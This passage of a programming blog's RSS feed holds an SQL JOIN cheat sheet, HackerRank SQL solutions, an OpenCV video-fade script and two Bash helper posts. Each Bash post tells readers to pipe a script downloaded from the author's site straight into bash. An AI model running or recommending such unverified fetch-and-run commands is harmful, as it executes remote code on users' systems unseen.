<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Art Of Code]]></title><description><![CDATA[Software and Data Science]]></description><link>http://localhost:8000/</link><image><url>http://localhost:8000/favicon.png</url><title>Art Of Code</title><link>http://localhost:8000/</link></image><generator>Ghost 2.9</generator><lastBuildDate>Tue, 10 Sep 2024 15:36:54 GMT</lastBuildDate><atom:link href="http://localhost:8000/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[The Ultimate SQL JOIN Cheat Sheet]]></title><description><![CDATA[If you're working with relational databases, you'll often need to combine data from multiple tables. SQL JOINs help you achieve this.]]></description><link>https://artofcode.tech/the-ultimate-sql-join-cheat-sheet</link><guid isPermaLink="false">Ghost__Post__66e0669021386f001b75a656</guid><category><![CDATA[sql]]></category><category><![CDATA[cheatsheet]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Tue, 10 Sep 2024 15:35:52 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/mgrmgktmgt.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/mgrmgktmgt.png" alt="The Ultimate SQL JOIN Cheat Sheet"/><p>If you're working with relational databases, you'll often need to combine data from multiple tables. SQL <code>JOINs</code> help you achieve this.</p><h3 id="understanding-inner-join">Understanding INNER JOIN</h3><p>An <code>INNER JOIN</code> retrieves rows where there is a match between the tables based on the specified join condition. If no match is found, no rows are returned for that combination.</p><p>The syntax for an <code>INNER JOIN</code> looks like this:</p><pre><code class="language-sql">-- [Mandatory] SELECT: Specifies the columns you want to retrieve.
SELECT
-- [Optional] DISTINCT: Ensures the result set contains only unique rows by removing duplicates.
-- Place DISTINCT immediately after SELECT if you want only unique rows.
-- DISTINCT
column1, -- Specify the first column you want to retrieve
column2, -- Specify the second column, and so on...
...
-- [Mandatory] FROM: The table from which you're selecting data.
FROM
table1
-- [Mandatory] INNER JOIN: Joins two tables and retrieves rows that have matching values in both tables.
INNER JOIN
table2 -- The second table you're joining with the first table
-- [Mandatory] ON: Specifies the condition that defines how the tables are related.
-- Only rows where the columns match will be included in the result set.
ON
table1.column = table2.column
-- [Optional] WHERE: Filters the rows returned by the join based on a specific condition.
-- Only rows that meet this condition will be included in the final result.
-- WHERE condition
-- [Optional] ORDER BY: Sorts the result set by the specified columns.
-- You can choose to sort in ascending (ASC) or descending (DESC) order.
-- ORDER BY column1 [ASC|DESC], column2 [ASC|DESC];
</code></pre><h3 id="understanding-outer-joins">Understanding OUTER JOINs</h3><p>While <code>INNER JOINs</code> return only matching rows between two tables, <code>OUTER JOINs</code> go further by also including rows that do not have a match in one of the tables. There are three types of <code>OUTER JOINs</code>:</p><ol><li><strong>LEFT OUTER JOIN</strong> (or simply <code>LEFT JOIN</code>): returns all rows from the left table and the matching rows from the right table. If no match is found, the result will contain <code>NULL</code> for the columns from the right table.</li><li><strong>RIGHT OUTER JOIN</strong> (or simply <code>RIGHT JOIN</code>): works in the opposite way of a <code>LEFT JOIN</code>. It returns all rows from the right table and the matching rows from the left table. If no match is found, the result will contain <code>NULL</code> for the columns from the left table.</li><li><strong>FULL OUTER JOIN:</strong> returns all rows when there is a match in either the left or right table. If there is no match, the result will contain <code>NULL</code> for the columns from the table without a match.</li></ol><p>Each of these joins is useful depending on the specific data retrieval needs.</p><hr><p>The syntax for an <code>OUTER JOIN</code> looks like this:</p><pre><code class="language-sql">-- [Mandatory] SELECT: Specifies the columns you want to retrieve.
SELECT
-- [Optional] DISTINCT: Ensures the result set contains only unique rows by removing duplicates.
-- Place DISTINCT immediately after SELECT if you want only unique rows.
-- DISTINCT
column1, -- Specify the first column you want to retrieve
column2, -- Specify the second column, and so on...
...
-- [Mandatory] FROM: The table from which you're selecting data.
FROM
table1
-- [Mandatory] OUTER JOIN: Includes rows from the specified table even if there is no match in the other table.
-- You can use LEFT OUTER JOIN, RIGHT OUTER JOIN, or FULL OUTER JOIN based on your needs.
-- LEFT OUTER JOIN: Includes all rows from the left table and matched rows from the right table.
-- RIGHT OUTER JOIN: Includes all rows from the right table and matched rows from the left table.
-- FULL OUTER JOIN: Includes all rows from both tables, with NULLs where there is no match.
-- Example: LEFT OUTER JOIN
LEFT OUTER JOIN
table2 -- The table you're joining with the first table
-- [Mandatory] ON: Specifies the condition that defines how the tables are related.
-- Only rows where the columns match will be included in the result set, or all rows from one table depending on the join type.
ON
table1.column = table2.column
-- [Optional] WHERE: Filters the rows returned by the join based on a specific condition.
-- Only rows that meet this condition will be included in the final result.
-- WHERE condition
-- [Optional] ORDER BY: Sorts the result set by the specified columns.
-- You can choose to sort in ascending (ASC) or descending (DESC) order.
-- ORDER BY column1 [ASC|DESC], column2 [ASC|DESC];
</code></pre><h3 id="example-of-inner-join">Example of INNER JOIN</h3><p>To retrieve employee names and their associated department names, where there is a matching department for each employee, you can use an <code>INNER JOIN</code>:</p><pre><code class="language-sql">SELECT
employees.employee_name,
departments.department_name
FROM
employees
INNER JOIN
departments
ON
employees.department_id = departments.department_id;
</code></pre><p>This query will return only the rows where there is a match between the <code>department_id</code> columns in both the <code>employees</code> and <code>departments</code> tables. If an employee does not have a corresponding department or a department has no employees, those rows will not appear in the result set.</p><h3 id="example-of-left-outer-join">Example of LEFT OUTER JOIN</h3><p>Let’s say we have an <code>employees</code> table and a <code>departments</code> table, and we want to retrieve all employees, even if they are not assigned to a department:</p><pre><code class="language-sql">SELECT
employees.employee_name,
departments.department_name
FROM
employees
LEFT OUTER JOIN
departments
ON
employees.department_id = departments.department_id;
</code></pre><p>In this example, the query will return all rows from the <code>employees</code> table, and if an employee does not belong to a department, the <code>department_name</code> will show as <code>NULL</code>.</p><h3 id="example-of-right-outer-join">Example of RIGHT OUTER JOIN</h3><p>Let’s modify our previous example to retrieve all departments, even if they don’t have any employees assigned:</p><pre><code class="language-sql">SELECT
employees.employee_name,
departments.department_name
FROM
employees
RIGHT OUTER JOIN
departments
ON
employees.department_id = departments.department_id;
</code></pre><p>This query will return all rows from the <code>departments</code> table, and if a department doesn’t have any employees, the <code>employee_name</code> will show as <code>NULL</code>.</p><h3 id="example-of-full-outer-join">Example of FULL OUTER JOIN</h3><p>To retrieve all employees and all departments, including those that don’t have a match in the other table, you can use a <code>FULL OUTER JOIN</code>:</p><pre><code class="language-sql">SELECT
employees.employee_name,
departments.department_name
FROM
employees
FULL OUTER JOIN
departments
ON
employees.department_id = departments.department_id;
</code></pre><p>This query will return all rows from both tables. If an employee is not assigned to a department, <code>department_name</code> will be <code>NULL</code>. If a department has no employees, <code>employee_name</code> will be <code>NULL</code>.</p><h3 id="example-left-outer-join-with-where-and-order-by">Example: LEFT OUTER JOIN with WHERE and ORDER BY</h3><p>Here’s a query that retrieves all employees (even those without a department) and filters the results to only include employees from specific departments. The result is sorted in ascending order by employee name.</p><pre><code class="language-sql">SELECT
DISTINCT employees.employee_name,
departments.department_name
FROM
employees
LEFT OUTER JOIN
departments
ON
employees.department_id = departments.department_id
WHERE
departments.department_name IN ('Sales', 'HR')
ORDER BY
employees.employee_name ASC;
</code></pre><p>Happy querying!</p></hr>]]></content:encoded></item><item><title><![CDATA[HackerRank SQL Preparation: Weather Observation Station 3(MySQL)]]></title><description><![CDATA[Query a list of CITY names from STATION for cities that have an even ID number. Print the results in any order, but exclude duplicates from the answer.]]></description><link>https://artofcode.tech/hackerrank-sql-preparation-weather-observation-station-3-mysql</link><guid isPermaLink="false">Ghost__Post__66cd2dc9e8f0d8001b246f6d</guid><category><![CDATA[sql]]></category><category><![CDATA[hackerrank]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Tue, 27 Aug 2024 01:40:27 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/eteree.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/eteree.png" alt="HackerRank SQL Preparation: Weather Observation Station 3(MySQL)"/><p><strong>Problem Statement:</strong>Query a list of CITY names from <strong>STATION</strong> for cities that have an even ID number. Print the results in any order, but exclude duplicates from the answer.</p><p><strong>Link:</strong> <a href="https://www.hackerrank.com/challenges/weather-observation-station-3/problem?isFullScreen=true">HackerRank - Weather Observation Station 3</a></p><p><strong>Solution:</strong></p><pre><code class="language-sql">SELECT DISTINCT CITY FROM STATION WHERE ID % 2 = 0;
</code></pre><p><strong>Explanation:</strong></p><ul><li><code>SELECT DISTINCT CITY</code>: This part of the query specifies that you want to retrieve the <code>CITY</code> column from the <strong>STATION</strong> table, and <code>DISTINCT</code> ensures that each city name is unique, eliminating any duplicates from the result.</li><li><code>FROM STATION</code>: Indicates that you are selecting data from the <strong>STATION</strong> table.</li><li><code>WHERE ID % 2 = 0</code>: This condition filters the rows to include only those cities where the <code>ID</code> is an even number. The modulo operation (<code>% 2 = 0</code>) checks if the <code>ID</code> is divisible by 2, meaning it's even.</li></ul><p>This query will return a list of unique city names from the <strong>STATION</strong> table where the city has an even <code>ID</code> number. The result will exclude any duplicate city names.</p>]]></content:encoded></item><item><title><![CDATA[HackerRank SQL Preparation: Weather Observation Station 1(MySQL)]]></title><description><![CDATA[Query a list of CITY and STATE from the STATION table.]]></description><link>https://artofcode.tech/hackerrank-sql-preparation-weather-observation-station-1-mysql</link><guid isPermaLink="false">Ghost__Post__6665f45f6003b9001b4e06a1</guid><category><![CDATA[sql]]></category><category><![CDATA[writeups]]></category><category><![CDATA[hackerrank]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sun, 09 Jun 2024 18:31:07 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Sin-t-tulo-1-3-.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Sin-t-tulo-1-3-.png" alt="HackerRank SQL Preparation: Weather Observation Station 1(MySQL)"/><p><strong>Problem Statement:</strong>Query a list of CITY and STATE from the <strong>STATION</strong> table.</p><p><strong>Link:</strong> <a href="https://www.hackerrank.com/challenges/weather-observation-station-1/problem">HackerRank - Weather Observation Station 1</a></p><p><strong>Solution:</strong></p><pre><code class="language-sql">SELECT CITY, STATE FROM STATION;
</code></pre><p><strong>Explanation:</strong></p><ul><li><code>SELECT CITY, STATE</code>: This part of the query specifies that you want to retrieve the <code>CITY</code> and <code>STATE</code> columns from the <strong>STATION</strong> table.</li><li><code>FROM STATION</code>: Indicates that you are selecting data from the <strong>STATION</strong> table.</li></ul>]]></content:encoded></item><item><title><![CDATA[HackerRank SQL Preparation: Japanese Cities' Names(MySQL)]]></title><description><![CDATA[Query the names of all Japanese cities in the CITY table. The COUNTRYCODE for Japan is JPN.]]></description><link>https://artofcode.tech/hackerrank-sql-preparation-japanese-cities-names-mysql</link><guid isPermaLink="false">Ghost__Post__6665f2b76003b9001b4e0690</guid><category><![CDATA[sql]]></category><category><![CDATA[writeups]]></category><category><![CDATA[hackerrank]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sun, 09 Jun 2024 18:23:45 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Sin-t-tulo-1-2-.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Sin-t-tulo-1-2-.png" alt="HackerRank SQL Preparation: Japanese Cities' Names(MySQL)"/><p><strong>Problem Statement:</strong>Query the names of all Japanese cities in the <strong>CITY</strong> table. The <code>COUNTRYCODE</code> for Japan is <code>JPN</code>.</p><p><strong>Link:</strong> <a href="https://www.hackerrank.com/challenges/japanese-cities-name/problem">HackerRank - Japanese Cities Name</a></p><p><strong>Solution:</strong></p><pre><code class="language-sql">SELECT NAME FROM CITY WHERE COUNTRYCODE = 'JPN';
</code></pre><p><strong>Explanation:</strong></p><ul><li><code>SELECT NAME</code>: This part of the query specifies that you want to retrieve the <code>NAME</code> column from the <strong>CITY</strong> table.</li><li><code>FROM CITY</code>: Indicates that you are selecting data from the <strong>CITY</strong> table.</li><li><code>WHERE COUNTRYCODE = 'JPN'</code>: This condition filters the rows to include only those cities where the <code>COUNTRYCODE</code> is 'JPN' (Japan).</li></ul>]]></content:encoded></item><item><title><![CDATA[HackerRank SQL Preparation: Japanese Cities' Attributes(MySQL)]]></title><description><![CDATA[Query all attributes of every Japanese city in the CITY table. The COUNTRYCODE for Japan is JPN.]]></description><link>https://artoftech.tech/hackerrank-sql-preparation-japanese-cities-attributes-mysql</link><guid isPermaLink="false">Ghost__Post__6661c37d7cfe7f001b840692</guid><category><![CDATA[sql]]></category><category><![CDATA[writeups]]></category><category><![CDATA[hackerrank]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 06 Jun 2024 14:17:35 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/kmfemkrmgkrg.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/kmfemkrmgkrg.jpg" alt="HackerRank SQL Preparation: Japanese Cities' Attributes(MySQL)"/><p><strong>Problem Statement:</strong>Query all attributes of every Japanese city in the <strong>CITY</strong> table. The <code>COUNTRYCODE</code> for Japan is <code>JPN</code>.</p><p><strong>Link:</strong> <a href="https://www.hackerrank.com/challenges/japanese-cities-attributes/problem">HackerRank - Japanese Cities Attributes</a></p><p><strong>Solution:</strong></p><pre><code class="language-sql">SELECT * FROM CITY WHERE COUNTRYCODE = 'JPN';
</code></pre><p><strong>Explanation:</strong></p><ul><li><code>SELECT *</code>: The asterisk (*) is a wildcard character in SQL that means "all columns." This part of the query specifies that you want to retrieve all columns from the table.</li><li><code>FROM CITY</code>: Indicates that you are selecting data from the <strong>CITY</strong> table.</li><li><code>WHERE COUNTRYCODE = 'JPN'</code>: This condition filters the rows to include only the cities where the <code>COUNTRYCODE</code> is 'JPN' (Japan).</li></ul><p>This query will return all the columns for every row in the <strong>CITY</strong> table where the <code>COUNTRYCODE</code> is 'JPN'. It's useful when you need to retrieve all details about every city in Japan.</p><p>By running this query, you can see the complete dataset of Japanese cities stored in the <strong>CITY</strong> table, including information such as city names, populations, districts, and other relevant attributes.</p>]]></content:encoded></item><item><title><![CDATA[HackerRank SQL Preparation: Select by ID(MySQL)]]></title><description><![CDATA[Query all columns for a city in the CITY table with the ID 1661.]]></description><link>https://artofcode.tech/hackerrank-sql-preparation-select-by-id-mysql</link><guid isPermaLink="false">Ghost__Post__6661c1947cfe7f001b840682</guid><category><![CDATA[sql]]></category><category><![CDATA[writeups]]></category><category><![CDATA[hackerrank]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 06 Jun 2024 14:07:10 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/wrtgeunenfje.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/wrtgeunenfje.png" alt="HackerRank SQL Preparation: Select by ID(MySQL)"/><p><strong>Problem Statement:</strong>Query all columns for a city in the <strong>CITY</strong> table with the ID 1661.</p><p><strong>Link:</strong> <a href="https://www.hackerrank.com/challenges/select-by-id/problem">HackerRank - Select by ID</a></p><p><strong>Solution:</strong></p><pre><code class="language-sql">SELECT * FROM CITY WHERE ID = 1661;
</code></pre><p><strong>Explanation:</strong></p><ul><li><code>SELECT *</code>: The asterisk (*) is a wildcard character in SQL that means "all columns." This part of the query specifies that you want to retrieve all columns from the table.</li><li><code>FROM CITY</code>: Indicates that you are selecting data from the <strong>CITY</strong> table.</li><li><code>WHERE ID = 1661</code>: This condition filters the rows to include only the city with the specific <code>ID</code> of 1661.</li></ul><p>This query will return all the columns for the row in the <strong>CITY</strong> table where the <code>ID</code> is 1661. It's useful when you need to retrieve all details about a specific city identified by its unique ID.</p><p>By running this query, you can see all the attributes (such as city name, country code, population, etc.) for the city that has the ID of 1661.</p>]]></content:encoded></item><item><title><![CDATA[HackerRank SQL Preparation: Select All(MySQL)]]></title><description><![CDATA[Query all columns (attributes) for every row in the CITY table.]]></description><link>https://artofcode.tech/hackerrank-sql-preparation-select-all-mysql</link><guid isPermaLink="false">Ghost__Post__6661bed37cfe7f001b84066b</guid><category><![CDATA[sql]]></category><category><![CDATA[writeups]]></category><category><![CDATA[hackerrank]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 06 Jun 2024 13:56:10 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/orgirrmgmr.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/orgirrmgmr.png" alt="HackerRank SQL Preparation: Select All(MySQL)"/><p><strong>Problem Statement: </strong>Query all columns (attributes) for every row in the <strong>CITY</strong> table.</p><p><strong>Link:</strong> <a href="https://www.hackerrank.com/challenges/select-all-sql/problem">HackerRank - Select All SQL</a></p><p><strong>Solution:</strong></p><pre><code class="language-sql">SELECT * FROM CITY;
</code></pre><p><strong>Explanation:</strong></p><ul><li><code>SELECT *</code>: The asterisk (*) is a wildcard character in SQL that means "all columns." This part of the query specifies that you want to retrieve all columns from the table.</li><li><code>FROM CITY</code>: Indicates that you are selecting data from the <strong>CITY</strong> table.</li></ul><p>This query will return all the columns for every row in the <strong>CITY</strong> table. It's useful when you need to inspect or analyze all data available in the table without any specific filtering or conditions.</p>]]></content:encoded></item><item><title><![CDATA[Automate binary execution at Startup with BASH]]></title><description><![CDATA[Automating the startup of frequently used binaries can save time and streamline your workflow. This blog post introduces a simple Bash script that adds specified binaries to a function that executes them every time you start your computer.]]></description><link>https://artofcode.tech/automate-binary-execution-at-startup-with-bash</link><guid isPermaLink="false">Ghost__Post__664e56ad5a1c18001b4cc7a2</guid><category><![CDATA[blog]]></category><category><![CDATA[linux]]></category><category><![CDATA[scripting]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 22 May 2024 20:41:16 GMT</pubDate><media:content url="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/SQL-SELECT-QUERY-CHEATSHEET.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/SQL-SELECT-QUERY-CHEATSHEET.png" alt="Automate binary execution at Startup with BASH"/><p>Automating the startup of frequently used binaries can save time and streamline your workflow. This blog post introduces a simple Bash script that adds specified binaries to a function that executes them every time you start your computer.</p><h3 id="benefits-of-automating-program-execution-at-startup-">Benefits of Automating Program Execution at Startup:</h3><ol><li><strong>Efficiency</strong>: Automating the startup of commonly used programs reduces manual steps and ensures your environment is ready with minimal effort.</li><li><strong>Consistency</strong>: Ensures that necessary programs and scripts are always running without the need to remember and manually start them each time.</li><li><strong>Productivity</strong>: Frees up mental bandwidth, allowing you to focus on your tasks rather than setting up your environment every time you boot your computer.</li><li><strong>Learning</strong>: Writing and modifying Bash scripts enhances your scripting skills and deepens your understanding of system startup processes.</li></ol><h3 id="the-script-">The Script:</h3><p>Our Bash script automates the process of executing binaries when our system starts, we made a function that takes a list of binaries and executes them, this will be added to your <code>.bashrc</code> file:</p><pre><code class="language-bash">function startup() {
BINARIES=(
"/usr/bin/firefox"
"/usr/bin/code")
check_binary() {
local binary=$1
if [ -x "$binary" ]; then
echo "Found binary: $binary, executing..."
"$binary" & disown
else
echo "Binary not found or not executable: $binary"
fi
}
for binary in "${BINARIES[@]}"; do
check_binary "$binary"
done
}
</code></pre><h3 id="instructions-for-using-the-script-">Instructions for Using the Script:</h3><p>After you boot up your system, just type the function name in a terminal:</p><pre><code class="language-bash">startup
</code></pre><p>You can also execute a gist that adds the function automatically to your <code>.bashrc</code> file, you can then modify the <code>BINARIES</code> and use the function on system boot up:</p><pre><code class="language-bash">curl -L https://artofcode.tech/add-startup-function | bash
</code></pre>]]></content:encoded></item><item><title><![CDATA[Simplifying PATH Management with Bash]]></title><description><![CDATA[In this blog post, we create a simple script that streamlines the process of adding directories to your PATH, with instructions on how to use it with curl.]]></description><link>https://artofcode.tech/simplifying-path-management-with-bash</link><guid isPermaLink="false">Ghost__Post__6639a12f47c3fc001b0bb25d</guid><category><![CDATA[blog]]></category><category><![CDATA[linux]]></category><category><![CDATA[path]]></category><category><![CDATA[scripting]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Tue, 07 May 2024 03:37:44 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/blog-entry-1-.png" medium="image"/><content:encoded><![CDATA[<hr><img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/blog-entry-1-.png" alt="Simplifying PATH Management with Bash"/><p>In the world of command-line, every keystroke counts. One essential aspect of this efficiency is managing your system's PATH variable. A well-managed PATH ensures easy access to frequently used scripts and executables. In this blog post, we introduce a simple Bash script that streamlines the process of adding directories to your PATH, along with instructions on how to use it with <code>curl</code>.</p><p><strong>Benefits of Writing Your Own Scripts and Adding Them to PATH:</strong></p><ol><li><strong>Efficiency:</strong> Writing custom scripts allows you to automate repetitive tasks and tailor them to your specific needs. By adding them to your PATH, you can execute them from anywhere in your terminal without specifying their full path.</li><li><strong>Consistency:</strong> Adding scripts to your PATH ensures consistency across your system. You don't have to remember the exact location of each script; they're readily available for execution.</li><li><strong>Flexibility:</strong> With scripts in your PATH, you have the flexibility to create your own command-line utilities tailored to your workflow. Whether it's simplifying complex commands or automating system tasks, the possibilities are endless.</li><li><strong>Knowledge Enhancement:</strong> Writing Bash scripts enhances your understanding of shell scripting and Linux systems. You'll learn about variables, loops, conditionals, and other fundamental concepts, empowering you to create more sophisticated scripts in the future.</li></ol><p><strong>Brief Description of the Script:</strong></p><p>Our Bash script automates the process of adding directories to your PATH variable in the <code>.bashrc</code> file. It takes the current directory you are in and adds it to the PATH in your <code>.bashrc</code> file.</p><pre><code class="language-bash">#!/bin/bash
# Function to add current directory to PATH in .bashrc file
add_current_dir_to_path() {
# Get the current directory
local current_dir=$(pwd)
# Print the current directory
echo "Current directory: $current_dir"
local shell_config=".bashrc"
# Check if the directory is already in PATH
if [[ ":$PATH:" == *":$current_dir:"* ]]; then
echo "Current directory is already in PATH."
else
# Check if PATH variable is empty
if [ -z "$PATH" ]; then
# If PATH is empty, directly append the current directory
echo "export PATH=$current_dir" >> "$HOME/$shell_config"
else
# Append the current directory to the PATH variable
echo "export PATH=\\\\$PATH:$current_dir" >> "$HOME/$shell_config"
fi
echo "Current directory added to PATH in $shell_config."
echo "Remember to execute 'source $shell_config' to update the PATH."
fi
}
# Call the function
add_current_dir_to_path
</code></pre><p><strong>Instructions for Using with curl:</strong></p><p>To use the script with <code>curl</code>, simply run the following command in your terminal:</p><pre><code class="language-bash">curl -L <https://artofcode.tech/add-path> | bash
</code></pre></hr>]]></content:encoded></item><item><title><![CDATA[Automating Video editing with programming knowledge]]></title><description><![CDATA[Many video editing tasks can be repetitive when applied frequently across different videos. In this blog post, we'll explore how to enhance videos by adding opacity transitions using Python and OpenCV.]]></description><link>https://artofcode.tech</link><guid isPermaLink="false">Ghost__Post__661ad4e6032f99001b2b93b8</guid><category><![CDATA[blog]]></category><category><![CDATA[automation]]></category><category><![CDATA[software]]></category><category><![CDATA[scripting]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sat, 13 Apr 2024 18:59:25 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/blog-entry.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/blog-entry.png" alt="Automating Video editing with programming knowledge"/><p>Many video editing tasks can be repetitive and time-consuming, especially when applied frequently across different videos. While professional software like Adobe After Effects offer scripting tools for automation, developers who prefer a streamlined approach without the need to open heavy software can turn to Python and OpenCV. In this blog post, we'll explore how to enhance videos by adding opacity transitions at the start and end using Python and OpenCV.</p><p><strong>Basic Functionalities of OpenCV:</strong></p><p>OpenCV is a popular library used for computer vision and image processing tasks. It provides a wide range of functionalities. In this blog post, we'll focus on leveraging OpenCV's video editing capabilities to add opacity transitions to a video.</p><p><strong>Adding Opacity Transitions with Python and OpenCV:</strong>To add opacity transitions to a video, we'll follow these steps:</p><ol><li><strong>Setting Up the Project:</strong>Import the necessary libraries (<code>cv2</code>, <code>numpy</code>, <code>tqdm</code>) and define the input and output video paths.</li><li><strong>Reading the Input Video:</strong>Use OpenCV to read the input video and retrieve its properties such as frame width, height, frame rate, and total frame count.</li><li><strong>Adding Opacity Transitions:</strong>Calculate opacity levels for the start and end transitions and apply them to the video frames using OpenCV's image manipulation functions.</li><li><strong>Writing the Output Video:</strong>Create a new video file and write the edited frames with opacity transitions using OpenCV's <code>VideoWriter</code> class.</li><li><strong>Displaying Progress and Messages:</strong>Use the <code>tqdm</code> library to create a progress bar and print informative messages during video processing.</li></ol><p>Here's the complete Python script for adding opacity transitions to a video using Python and OpenCV:</p><pre><code class="language-jsx">import cv2
import numpy as np
from tqdm import tqdm
input_video_path = 'input_video.mp4'
output_video_path = 'output_video.mp4'
cap = cv2.VideoCapture(input_video_path)
if not cap.isOpened():
print("Error: Could not open video file.")
exit()
frame_width = int(cap.get(3))
frame_height = int(cap.get(4))
fps = int(cap.get(5))
frame_count = int(cap.get(7))
fade_frames = 15 # Number of frames for the opacity transition
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
out = cv2.VideoWriter(output_video_path, fourcc, fps, (frame_width, frame_height))
with tqdm(total=frame_count) as pbar:
for i in range(frame_count):
ret, frame = cap.read()
if not ret:
break
# Calculate opacity for the start and end transitions
start_alpha = min(1.0, i / fade_frames)
end_alpha = min(1.0, (frame_count - i) / fade_frames)
# Apply opacity transitions
frame = cv2.addWeighted(frame, start_alpha, frame, 0, 0)
frame = cv2.addWeighted(frame, end_alpha, frame, 0, 0)
out.write(frame)
pbar.update(1)
cap.release()
out.release()
cv2.destroyAllWindows()
print("Video processing completed.")
</code></pre><p>The result looks something like this:</p><p><a href="https://www.youtube.com/shorts/Pbb1FYdNdlc">https://www.youtube.com/shorts/Pbb1FYdNdlc</a></p><p>Experiment with the provided script, adjust parameters, and explore additional video editing functionalities offered by OpenCV to take your video editing skills to the next level.</p>]]></content:encoded></item><item><title><![CDATA[HackerRank SQL preparation; Revising the Select Query II(MySQL)]]></title><description><![CDATA[Query the NAME field for American cities in the CITY table with populations larger than 120,000. The CountryCode for America is USA]]></description><link>https://artofcode.tech/hackerrank-sql-preparation-revising-the-select-query-ii-mysql</link><guid isPermaLink="false">Ghost__Post__660dcfd26ff9c2001b41b437</guid><category><![CDATA[sql]]></category><category><![CDATA[hackerrank]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 03 Apr 2024 21:58:35 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Sin-t-tulo-1-1-.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Sin-t-tulo-1-1-.png" alt="HackerRank SQL preparation; Revising the Select Query II(MySQL)"/><p><strong>Problem Statement: </strong>Query the <code>NAME</code> field for American cities in the <strong>CITY</strong> table with populations larger than 120,000. The <code>CountryCode</code> for America is <code>USA</code>.</p><p><strong>Link:</strong><a href="https://www.hackerrank.com/challenges/revising-the-select-query-2/problem">HackerRank - Revising the SELECT Query 2</a></p><p><strong>Solution:</strong></p><pre><code class="language-sql">SELECT NAME FROM CITY WHERE POPULATION > 120000 AND COUNTRYCODE = 'USA';
</code></pre><p><strong>Explanation:</strong></p><ul><li><code>SELECT NAME</code>: This part of the query specifies that you want to retrieve the <code>NAME</code> field.</li><li><code>FROM CITY</code>: Indicates that you are selecting data from the <strong>CITY</strong> table.</li><li><code>WHERE POPULATION > 120000</code>: This condition filters the rows and includes only those cities where the population is larger than 120,000.</li><li><code>AND COUNTRYCODE = 'USA'</code>: This additional condition ensures that only American cities (USA) are included in the result, based on the <code>CountryCode</code> column.</li></ul>]]></content:encoded></item><item><title><![CDATA[HackerRank SQL Preparation: Revising the Select Query I(MySQL)]]></title><description><![CDATA[Query all columns for American cities in the CITY table with populations larger than 100000. The CountryCode for America is USA.]]></description><link>https://artofcode.tech/hackerrank-sql-preparation-revising-the-select-query-i-mysql</link><guid isPermaLink="false">Ghost__Post__660b12e77f44ba001b57c883</guid><category><![CDATA[writeups]]></category><category><![CDATA[sql]]></category><category><![CDATA[hackerrank]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Mon, 01 Apr 2024 20:07:05 GMT</pubDate><media:content url="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Sin-t-tulo-1.png" medium="image"/><content:encoded><![CDATA[<img 